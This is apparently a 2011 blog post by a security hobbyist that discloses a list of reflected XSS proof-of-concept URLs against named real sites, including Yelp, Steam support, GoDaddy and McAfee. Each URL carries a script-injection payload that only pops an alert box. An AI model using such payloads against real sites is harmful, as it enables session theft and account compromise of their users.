Random XSS
I have a bad habit of saving these little random bugs and telling myself that I ‘may have a need for them later’. I think thats just the paranoid security guy in me, but then again I do the same for random little electronic parts I find. Given the fact I just cleaned out all my old parts, I figured I need to do the same for these so here are some random XSS bugs I’ve found. As of now (Tue Jan 4 21:07:03 EST 2011) all are unpatched except for the mint.com one (on a side note, their group of guys seems great!)
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//
